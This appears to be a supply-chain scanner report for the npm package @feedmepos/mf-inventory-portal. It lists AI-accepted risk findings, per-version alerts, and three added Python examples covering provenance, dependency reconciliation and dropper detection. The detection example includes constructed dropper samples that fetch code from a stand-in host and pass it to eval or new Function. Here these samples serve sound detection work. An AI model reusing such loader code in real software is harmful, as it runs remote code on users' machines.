@feedmepos/mf-inventory-portal
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source: nothing attests which repository, commit and build workflow produced the published artifact, so a tarball built from modified or unpublished source is indistinguishable from a clean one. The axios compromise (March 2026) relied on exactly this gap.
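What provenance would add, as an added example that is not part of this scanner or of the package: a walk over a SLSA v1 provenance statement to see what it binds to a given tarball. It assumes the attestation has already been fetched from the registry (npm serves them under `/-/npm/v1/attestations/<name>@<version>`) and that the DSSE signature over it has been verified by sigstore-aware tooling such as `npm audit signatures`; it deliberately does not verify signatures itself. The tarball bytes, repository, workflow path and commit are constructed placeholders, not the package's real values.

```python
"""Added example (not the scanner's or the package's own code): what a SLSA v1
provenance statement binds to an npm tarball. Signature verification over the
DSSE envelope is assumed to have been done by sigstore-aware tooling
(`npm audit signatures`); this only walks the already-verified statement."""
import base64
import hashlib
import json

INTOTO_V1 = "https://in-toto.io/Statement/v1"
SLSA_V1 = "https://slsa.dev/provenance/v1"


def integrity_to_hex(integrity: str) -> str:
    """npm's dist.integrity is an SRI string 'sha512-<base64>'; in-toto
    subjects carry the same digest as hex."""
    algo, b64 = integrity.split("-", 1)
    if algo != "sha512":
        raise ValueError(f"unexpected SRI algorithm {algo}")
    return base64.b64decode(b64).hex()


def purl(name: str, version: str) -> str:
    """package-url used as the subject name; a scope's '@' is percent-encoded."""
    return f"pkg:npm/{name.replace('@', '%40', 1)}@{version}"


def decode_statement(envelope: dict) -> dict:
    """Decode the in-toto statement from a DSSE envelope (signature NOT checked here)."""
    if envelope.get("payloadType") != "application/vnd.in-toto+json":
        raise ValueError("payload is not an in-toto statement")
    return json.loads(base64.b64decode(envelope["payload"]))


def provenance_binding(statement: dict, name: str, version: str, integrity: str) -> dict:
    """Return the source and build facts the statement binds to this exact
    tarball, or raise if the statement is not about this tarball."""
    if statement.get("_type") != INTOTO_V1 or statement.get("predicateType") != SLSA_V1:
        raise ValueError("not a SLSA v1 provenance statement")
    want = purl(name, version)
    subject = next((s for s in statement["subject"] if s["name"] == want), None)
    if subject is None:
        raise ValueError(f"statement does not cover {want}")
    if subject["digest"].get("sha512") != integrity_to_hex(integrity):
        raise ValueError("subject digest differs from the registry tarball digest")
    pred = statement["predicate"]
    build = pred["buildDefinition"]
    workflow = build["externalParameters"]["workflow"]
    commit = next(
        (d["digest"]["gitCommit"] for d in build.get("resolvedDependencies", [])
         if "gitCommit" in d.get("digest", {})),
        None,
    )
    return {
        "repository": workflow["repository"],
        "ref": workflow["ref"],
        "workflow": workflow["path"],
        "commit": commit,
        "builder": pred["runDetails"]["builder"]["id"],
    }


# --- constructed sample: stand-in tarball bytes and a statement that matches them ---
PKG, VER = "@feedmepos/mf-inventory-portal", "1.5.8"
TARBALL = b"constructed stand-in for the published tarball bytes"
INTEGRITY = "sha512-" + base64.b64encode(hashlib.sha512(TARBALL).digest()).decode()
REPO = "https://github.com/example-org/example-repo"  # placeholder, not the real repository

SAMPLE_STATEMENT = {
    "_type": INTOTO_V1,
    "subject": [{"name": purl(PKG, VER), "digest": {"sha512": hashlib.sha512(TARBALL).hexdigest()}}],
    "predicateType": SLSA_V1,
    "predicate": {
        "buildDefinition": {
            "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
            "externalParameters": {"workflow": {
                "ref": "refs/tags/v1.5.8", "repository": REPO, "path": ".github/workflows/publish.yml"}},
            "resolvedDependencies": [{"uri": f"git+{REPO}@refs/tags/v1.5.8", "digest": {"gitCommit": "0" * 40}}],
        },
        "runDetails": {"builder": {"id": "https://github.com/actions/runner/github-hosted"}},
    },
}
SAMPLE_ENVELOPE = {
    "payloadType": "application/vnd.in-toto+json",
    "payload": base64.b64encode(json.dumps(SAMPLE_STATEMENT).encode()).decode(),
    "signatures": [{"keyid": "", "sig": "<checked by sigstore tooling, not here>"}],
}


def demo() -> dict:
    return provenance_binding(decode_statement(SAMPLE_ENVELOPE), PKG, VER, INTEGRITY)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The digest comparison is the whole point: the registry's `dist.integrity` for the tarball you install must equal the subject digest inside the signed statement, and only then do the repository, ref, commit and workflow in the predicate say anything about that tarball. A statement whose subject does not match (wrong version, wrong bytes) is rejected rather than partially trusted.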
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/app-BtIUZZer.js | AI (source-diff): Standard Vite minified bundle for this internal portal; consistent across versions. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-DfpzUsNl.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | net-exec-file:dist/lodash-D9rnJgGZ.js | AI (source-diff): False positive: lodash template/Function usage + app HTTP calls, not a dropper. | ai | |
| source-diff | obfuscated-file:dist/lodash-D9rnJgGZ.js | AI (source-diff): Bundled lodash 4.17.21 UMD; MIT-licensed, clearly identified in file header. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-BEB7pV9M.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-ByvhMaCO.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-D-7q6p_s.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/index-CKErlM6H.js | AI (source-diff): Vite chunk; stable pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-xOeZ1dcl.js | AI (source-diff): Vite-bundled output; CI env var leak is a build hygiene issue, not a security threat. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-BMkVjCEy.js | AI (source-diff): Standard Vite minified Vue component bundle. | ai | |
| source-diff | net-exec-file:dist/lodash-BrwnA6r2.js | AI (source-diff): False positive on bundled lodash; no actual network+exec dropper pattern present. | ai | |
| source-diff | obfuscated-file:dist/lodash-BrwnA6r2.js | AI (source-diff): Bundled lodash 4.17.21 with MIT license header; standard Vite code-splitting. | ai | |
| source-diff | obfuscated-file:dist/app-BPfT1Di5.js | AI (source-diff): Standard Vite minified bundle for internal FeedMe micro-frontend; readable Vue/Pinia code in samples. | ai | |
| source-diff | obfuscated-file:dist/index-DnDQuIzj.js | AI (source-diff): Standard Vite minified bundle; sample shows normal ES module re-exports. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-Bmff-FkE.js | AI (source-diff): Standard Vite minified Vue component bundle. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-B7MCWj08.js | AI (source-diff): Standard Vite minified Vue component bundle. | ai | |
| source-diff | obfuscated-file:dist/app-BYsl6Q0k.js | AI (source-diff): Standard Vite minified bundle for this SPA; readable identifiers and org-internal imports confirm legitimate build output. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-CBK89oKb.js | AI (source-diff): Vite chunk with readable CRUD API calls to org backend; no malicious patterns. | ai | |
| source-diff | net-exec-file:dist/lodash-PCSvaIXr.js | AI (source-diff): False positive; lodash uses Function constructor internally for template compilation, not for network-fetched code execution. | ai | |
| source-diff | obfuscated-file:dist/lodash-PCSvaIXr.js | AI (source-diff): Minified lodash 4.17.21 with MIT license header; standard Vite vendor chunk. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-B2h72dXO.js | AI (source-diff): Vite chunk; env vars embedded from GitHub Actions CI build, consistent with legitimate CI pipeline. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-BXiSzB-N.js | AI (source-diff): Vite chunk; standard minified Vue component bundle. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-DclCC5r6.js | AI (source-diff): Vite chunk; imports from org-internal modules, no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/index-DkhSxroI.js | AI (source-diff): Vite chunk with readable code; no malicious patterns. | ai | |
| phantom-deps | phantom-dep:@typescript-eslint/typescript-estree | AI (phantom-deps): Config-referenced dev tooling phantom dep; stable pattern. | ai | |
| phantom-deps | phantom-dep:libphonenumber-js | AI (phantom-deps): Org-internal micro-frontend; phantom deps are config-referenced, stable pattern across versions. | ai | |
| phantom-deps | phantom-dep:@codemirror/lang-json | AI (phantom-deps): Config-referenced phantom dep; stable pattern for this package. | ai | |
| phantom-deps | phantom-dep:vue-country-flag-next | AI (phantom-deps): Config-referenced phantom dep; stable pattern for this package. | ai | |
| phantom-deps | phantom-dep:@feedmepos/feature-flag | AI (phantom-deps): Same-org scope; phantom dep pattern stable for this micro-frontend. | ai | |
| phantom-deps | phantom-dep:@feedmepos/inventory-core-js | AI (phantom-deps): Same-org scope; phantom dep pattern stable for this micro-frontend. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core-2 | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/custom-attributes | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core-js | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/inventory-core-dart | AI (dependencies): Same-org internal dependency. | ai | |
| provenance | no-provenance | AI (provenance): Internal org package; provenance not expected in this publishing workflow. | ai | |
| dependencies | unvetted-dep:xlsx | AI (dependencies): Well-known spreadsheet library; no active advisory affecting this constraint. | ai | |
| dependencies | unvetted-dep:handlebars | AI (dependencies): Established templating library; ^4.7.8 is the patched line. | ai | |
| dependencies | unvetted-dep:@feedmepos/core | AI (dependencies): Same-org internal dependency; consistent with feedmepos monorepo pattern. | ai | |
| dependencies | unvetted-dep:@feedmepos/menu | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/feature-flag | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/netsuite-core | AI (dependencies): Same-org internal dependency. | ai | |
| dependencies | unvetted-dep:@feedmepos/zod-inventory | AI (dependencies): Same-org internal dependency. | ai | |
| source-diff | obfuscated-file:dist/predefined-templates-CS9U9npp.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | net-exec-file:dist/lodash-DKmhfMJj.js | AI (source-diff): Lodash UMD bundle; Function() use is lodash's template engine, not malware. Stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/app-D9p-rdE3.js | AI (source-diff): Standard Vite minified bundle; readable imports and structure confirm legitimate build output. | ai | |
| source-diff | obfuscated-file:dist/index-B_GTpER9.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationExplorerView-B_uw3hNL.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/IntegrationView-DZUeTXN6.js | AI (source-diff): Standard Vite minified bundle; stable false positive for this package. | ai | |
| source-diff | obfuscated-file:dist/inventory-core-dart.default-CkY4Tsyv.js | AI (source-diff): Vite bundle with embedded CI env snapshot; no credentials or exfiltration, stable false positive. | ai | |
| source-diff | obfuscated-file:dist/lodash-DKmhfMJj.js | AI (source-diff): Lodash UMD bundle; stable false positive for this package. | ai | |
| phantom-deps | phantom-dep:google-maps | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:change-case | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:handlebars | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:codemirror | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:lz-string | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:dompurify | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:csstype | AI (phantom-deps): Type-only dep; not directly imported in source. | ai | |
| phantom-deps | phantom-dep:lodash | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:dotenv | AI (phantom-deps): Build-time env config; not a direct import. | ai | |
| phantom-deps | phantom-dep:fuzzy | AI (phantom-deps): Config-level declaration; stable false positive for this package. | ai | |
| phantom-deps | phantom-dep:dayjs | AI (phantom-deps): Same pattern — config-level declaration in a bundled micro-frontend. | ai | |
| phantom-deps | phantom-dep:axios | AI (phantom-deps): Large internal Vue app; deps declared for bundler/config use, not direct imports. | ai | |
| phantom-deps | phantom-dep:dinero.js | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:vue-i18n | AI (phantom-deps): Framework convention; loaded by plugin, not direct import. | ai | |
| phantom-deps | phantom-dep:debounce | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:node-html-parser | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:@vue/cli-service | AI (phantom-deps): Framework-scoped build tool; loaded by convention. | ai | |
| phantom-deps | phantom-dep:@types/dinero.js | AI (phantom-deps): Type-only dep; framework-scoped, not directly imported. | ai | |
| phantom-deps | phantom-dep:html2pdf.js | AI (phantom-deps): Config-level declaration; stable false positive. | ai | |
| phantom-deps | phantom-dep:eventsource | AI (phantom-deps): Config-level declaration; stable false positive. | ai |
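The phantom-deps rows above all rest on the same argument: the dependency is declared in package.json but never imported from source, and the only trace of it is a config file or a type reference. The added example below (not the scanner's or the package's own code) reconciles a package.json against the import specifiers in a set of source files and separates declared-but-unreferenced packages from those named only in a config file. Note the terminology: this page's "phantom-dep" is the declared-but-not-imported direction; pnpm and Rush use "phantom dependency" for the opposite (imported but undeclared), which the example reports as well. The package.json and files are constructed samples; the builtin list and config-file pattern are partial and are assumptions.

```python
"""Added example (not the scanner's or the package's own code): reconcile the
dependencies a package.json declares against what the source actually imports,
in both directions. Sample package.json and files are constructed."""
from __future__ import annotations

import re

# Import forms a bundler resolves: `import x from 'm'`, `import 'm'`,
# `export { y } from 'm'`, `require('m')` and dynamic `import('m')`.
SPECIFIER_RE = re.compile(
    r"""(?:\bimport\s*(?:[\w*{}\s,$]+\s+from\s*)?|\bexport\s+[\w*{}\s,$]+\s+from\s*"""
    r"""|\brequire\s*\(\s*|\bimport\s*\(\s*)['"]([^'"]+)['"]"""
)
# Files where a dependency may legitimately appear only as a string, e.g.
# vite's optimizeDeps.include or a tsconfig "types" entry (pattern is an assumption).
CONFIG_FILE_RE = re.compile(
    r"(?:^|/)(?:vite|vue|vitest|tailwind|postcss)\.config\.[cm]?[jt]s$|tsconfig[^/]*\.json$"
)
NODE_BUILTINS = {"fs", "path", "os", "url", "http", "https", "crypto", "child_process"}  # partial list


def package_name(specifier: str) -> str | None:
    """Map an import specifier to its package name, or None for local/builtin."""
    if specifier.startswith((".", "/", "node:", "virtual:")):
        return None
    parts = specifier.split("/")
    if specifier.startswith("@"):  # scoped: '@scope/pkg/sub' -> '@scope/pkg'
        return "/".join(parts[:2]) if len(parts) >= 2 else None
    return None if parts[0] in NODE_BUILTINS else parts[0]


def classify_deps(package_json: dict, files: dict[str, str]) -> dict[str, list[str]]:
    declared = set(package_json.get("dependencies", {})) | set(package_json.get("devDependencies", {}))
    imported, config_ref = set(), set()
    for path, src in files.items():
        for spec in SPECIFIER_RE.findall(src):
            name = package_name(spec)
            if name:
                imported.add(name)
        if CONFIG_FILE_RE.search(path):
            # a declared dep named as a string literal in a config file
            for dep in declared:
                if re.search(rf"""['"]{re.escape(dep)}(?:/[^'"]*)?['"]""", src):
                    config_ref.add(dep)
    not_imported = declared - imported
    return {
        "imported": sorted(imported),
        "config_only": sorted(not_imported & config_ref),   # declared, only named in config
        "unreferenced": sorted(not_imported - config_ref),  # declared, never referenced at all
        "imported_not_declared": sorted(imported - declared),  # pnpm's "phantom dependency"
    }


# --- constructed sample project ---
SAMPLE_PACKAGE_JSON = {
    "name": "@example/mf-portal",
    "dependencies": {"axios": "^1.6.0", "lodash": "^4.17.21", "dompurify": "^3.0.0",
                     "handlebars": "^4.7.8", "@example/core": "^2.0.0"},
    "devDependencies": {"@vitejs/plugin-vue": "^5.0.0", "csstype": "^3.1.0"},
}
SAMPLE_FILES = {
    "src/main.ts": (
        "import { createApp } from 'vue'\n"
        "import axios from 'axios'\n"
        "import debounce from 'lodash/debounce'\n"
        "import { api } from '@example/core/dist/api'\n"
        "import './style.css'\n"
    ),
    "src/views/Report.vue": (
        '<script setup lang="ts">\n'
        "const xlsx = await import('xlsx')\n"
        "const tpl = require('./tpl.hbs')\n"
        "</script>\n"
    ),
    "vite.config.ts": (
        "import vue from '@vitejs/plugin-vue'\n"
        "export default { plugins: [vue()], optimizeDeps: { include: ['handlebars'] } }\n"
    ),
}


if __name__ == "__main__":
    for key, names in classify_deps(SAMPLE_PACKAGE_JSON, SAMPLE_FILES).items():
        print(f"{key}: {names}")
```

Run against a real tarball, walk the extracted `package/` directory and feed every `.js`, `.ts`, `.vue` and config file into `files`. The useful output for a reviewer is the split: a `config_only` entry (handlebars here) has the explanation the table gives, while an `unreferenced` entry has none and deserves a look at whether it is dead weight or something the bundle pulls in by another path.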
Versions (showing 15 of 15)
| Version | Deps | Published |
|---|---|---|
| 1.5.8 | 43 / 30 | |
| 1.5.7 | 43 / 30 | |
| 1.5.6 | 43 / 30 | |
| 1.5.5 | 43 / 30 | |
| 1.5.4 | 43 / 30 | |
| 1.5.3 | 43 / 30 | |
| 1.5.2 | 43 / 30 | |
| 1.5.1 | 43 / 30 | |
| 1.5.0 | 43 / 30 | |
| 1.4.4 | 43 / 30 | |
| 1.4.3 | 43 / 30 | |
| 1.4.2 | 43 / 30 | |
| 1.4.1 | 43 / 30 | |
| 1.4.0 | 43 / 30 | |
| 1.3.16 | 42 / 30 | |
v1.5.8
9 findings
- 7 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 1 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- 1 × [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
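The two source-diff rules that fire on every release from 1.5.5 onward are heuristics: a line-length threshold for the obfuscated-file finding, and co-occurrence of a network token and an exec token for the net-exec-file finding. The added example below (not the scanner's or the package's own code) implements both as described, then a stricter network-to-exec check that only fires when fetched content actually reaches an `eval`/`Function` sink. Run over constructed samples, it shows why a bundled lodash chunk (template compiler using `Function`, app HTTP calls elsewhere in the file) trips the coarse rule but not the stricter one, while a promise-chain dropper and a staged `await fetch` dropper trip both. Sample chunks and hostnames are constructed.

```python
"""Added example (not the scanner's or the package's own code): the two
source-diff heuristics from the findings above, plus a stricter
network-to-exec check, run over constructed samples."""
import re

LONG_LINE = 3000
NET_RE = re.compile(r"\b(?:fetch|XMLHttpRequest|axios|https?\.(?:get|request))\b")
EXEC_RE = re.compile(r"\b(?:eval|Function|child_process|vm\.runIn\w*Context)\b")
# fetch(...).then(...)...eval / Function inside one promise chain (no ';' crossed)
CHAIN_RE = re.compile(r"\bfetch\([^;]*?\.then\([^;]*?\b(?:eval|Function)\b")
# `x = await fetch(...)` / `x = (await fetch(...))`: x is a tainted response
FROM_FETCH_RE = re.compile(r"\b(\w+)\s*=\s*(?:await\s+)?\(?\s*(?:await\s+)?fetch\(")
# `y = await x.text()` / .json() / .arrayBuffer(): body of a tainted response
FROM_BODY_RE = re.compile(
    r"\b(\w+)\s*=\s*(?:await\s+)?\(?\s*(?:await\s+)?(\w+)\.(?:text|json|arrayBuffer)\(\)"
)
# eval(x) / Function(x) / new Function(x) / (0, eval)(x) with a bare identifier
SINK_RE = re.compile(r"(?:\b(?:eval|Function)|\(0,\s*eval\))\(\s*(\w+)\s*\)")


def longest_line(src: str) -> int:
    return max((len(line) for line in src.splitlines()), default=0)


def is_minified(src: str, threshold: int = LONG_LINE) -> bool:
    """The obfuscated-file rule: any line longer than the threshold."""
    return longest_line(src) > threshold


def net_exec_naive(src: str) -> bool:
    """The net-exec-file rule: a network token and an exec token anywhere in the
    same file. lodash's template compiler plus one app HTTP call is enough."""
    return bool(NET_RE.search(src)) and bool(EXEC_RE.search(src))


def net_exec_dataflow(src: str) -> bool:
    """Flag only when fetched content reaches an eval/Function sink, either inside
    one promise chain or through identifiers assigned from the response body."""
    if CHAIN_RE.search(src):
        return True
    tainted = set(FROM_FETCH_RE.findall(src))
    changed = True
    while changed:  # propagate through response.text()/json() until a fixpoint
        changed = False
        for lhs, rhs in FROM_BODY_RE.findall(src):
            if rhs in tainted and lhs not in tainted:
                tainted.add(lhs)
                changed = True
    return any(arg in tainted for arg in SINK_RE.findall(src))


def scan(src: str) -> dict:
    return {
        "minified": is_minified(src),
        "net_exec_naive": net_exec_naive(src),
        "net_exec_dataflow": net_exec_dataflow(src),
    }


# --- constructed samples ---
# lodash-style chunk: app fetch call, then a template compiler built on Function(),
# all on one very long line as a minified bundle is
LODASH_CHUNK = (
    'fetch("/api/items").then(function(r){return r.json()});'
    'var template=function(s){var keys=["_"],src="return "+JSON.stringify(s);return Function(keys,src)};'
    + "var a=1;" * 400
)
# ordinary minified Vue chunk: long line, HTTP helper, no exec sink at all
VUE_CHUNK = 'import{a as e}from"./index-abc.js";' + 'e("/api/items");' * 250
# dropper, promise-chain form
DROPPER_CHAIN = 'fetch("https://loader.example/p").then(r=>r.text()).then(t=>eval(t));'
# dropper, staged across statements with await
DROPPER_STAGED = (
    'const r = await fetch("https://loader.example/stage2");\n'
    "const t = await r.text();\n"
    "new Function(t)();\n"
)


if __name__ == "__main__":
    for label, src in [("lodash", LODASH_CHUNK), ("vue", VUE_CHUNK),
                       ("dropper-chain", DROPPER_CHAIN), ("dropper-staged", DROPPER_STAGED)]:
        print(label, scan(src))
```

The stricter check is still regex-level triage, not proof: it follows `(0, eval)(x)` but not a sink name assembled at runtime (`window["ev"+"al"]`) or content routed through a Worker or a `<script>` element, so a clean result narrows the review rather than ending it. The point it does make is the one the accepted-risk rows make in prose: co-occurrence of `fetch` and `Function` in a 3000-character line is what every Vite vendor chunk looks like, and a rule that cannot tell that from a loader will keep producing the same seven accepted findings per release.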
v1.5.7
9 findings
- 7 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 1 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- 1 × [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.6
9 findings
- 7 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 1 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- 1 × Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.5
9 findings
- 7 × Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- 1 × Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- 1 × [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.5.3
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.5.2
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.5.1
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.5.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.4
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.3
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.2
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.1
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.4.0
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v1.3.16
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.